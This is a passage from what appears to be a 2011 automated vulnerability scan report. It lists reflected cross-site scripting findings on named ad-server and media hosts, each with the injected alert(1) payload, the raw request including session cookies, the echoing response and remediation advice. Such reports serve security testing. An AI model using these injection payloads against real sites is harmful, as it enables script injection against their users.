Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=12244bc34a8b1dc; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:54 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7703

var cid='12244bc34a8b1dc';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-10212190423_1314813294","http://ib.adnxs.com/ptj?member=988&inv_code=ns.informitadf09'-alert(1)-'882062a794c&size=728x90&imp_id=ns-10212190423_1314813294,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informitadf09%27-alert%281%29-%2788
...[SNIP]...

1.6. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49732'-alert(1)-'e101f0e3a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj49732'-alert(1)-'e101f0e3a6e/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:46 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30314283681_1313102566","http://ad.doubleclick.net/adj49732'-alert(1)-'e101f0e3a6e/q1.nydailynews/be_news_fr;net=q1;u=,q1-30314283681_1313102566,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=13131
...[SNIP]...

1.7. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3ae6'-alert(1)-'d4fccf3dad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynewsc3ae6'-alert(1)-'d4fccf3dad4/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:48 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30121332100_1313102568","http://ad.doubleclick.net/adj/q1.nydailynewsc3ae6'-alert(1)-'d4fccf3dad4/be_news_fr;net=q1;u=,q1-30121332100_1313102568,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=1313102451.47533??",
...[SNIP]...

1.8. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ab3'-alert(1)-'496270f1c8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynews/be_news_frc8ab3'-alert(1)-'496270f1c8d;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105561087_1313102569","http://ad.doubleclick.net/adj/q1.nydailynews/be_news_frc8ab3'-alert(1)-'496270f1c8d;net=q1;u=,q1-30105561087_1313102569,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=1313102451.47533??","728","90",
...[SNIP]...

1.9. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb061'-alert(1)-'3b9133a92e3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynews/be_news_fr;sz=bb061'-alert(1)-'3b9133a92e3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:41 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Content-Length: 7729

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
eMedia.createAndAttachAd("q1-30314090774_1313102561","http://ad.doubleclick.net/adj/q1.nydailynews/be_news_fr;net=q1;u=,q1-30314090774_1313102561,1214cf76b201e60,none,q1.educat_m-q1.fam_l;;cmw=nurl;sz=bb061'-alert(1)-'3b9133a92e3;contx=none;dc=s;btg=q1.educat_m;btg=q1.fam_l?","bb061'-alert(1)-'3b9133a92e3","",false);</scr'+'ipt>
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [dcove parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ad5"-alert(1)-"299ee2f63f6 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5599
Date: Thu, 11 Aug 2011 22:35:47 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
65832709%3B3454-728/90%3B42962870/42980657/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com");
var
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b85d2"-alert(1)-"9fb1a5c772 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5598
Date: Thu, 11 Aug 2011 22:36:13 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
B3454-728/90%3B42962886/42980673/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com");
var dcpass =
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc4b"-alert(1)-"25b430650 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5594
Date: Thu, 11 Aug 2011 22:36:42 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=http://www.chevydealer.com");
var dcpass = "?cmp=OLA_BRAND_5198302_42962886";
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
va
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [redirectURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e6bc"-alert(1)-"86ae1e132e1 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5386
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:37:12 GMT
Expires: Thu, 11 Aug 2011 22:37:12 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1http://www.chevydealer.com");
var dcpass = "?cmp=OLA_BRAND_5198302_42962886";
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
...[SNIP]...

1.14. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3468"><script>alert(1)</script>4e3e8f5f0f was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=f3468"><script>alert(1)</script>4e3e8f5f0f&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8397/13532
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15244%7C15235%7C15228%7C15228%7C15231

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 22:12:10 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=7338351112149216207&fpid=f3468"><script>alert(1)</script>4e3e8f5f0f&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.15. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d9e"><script>alert(1)</script>2194221d73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=c1d9e"><script>alert(1)</script>2194221d73c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8397/13532
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15244%7C15235%7C15228%7C15228%7C15231

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 22:12:11 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=2694303666463007078&fpid=6&nu=n&t=&sp=c1d9e"><script>alert(1)</script>2194221d73c&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.16. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cfb"-alert(1)-"dabdda859b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images46cfb"-alert(1)-"dabdda859b0/save-and-share-icons/icon-digg.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=74E2CD078A8986D4135E450A33C6290B7C42F007; path=/
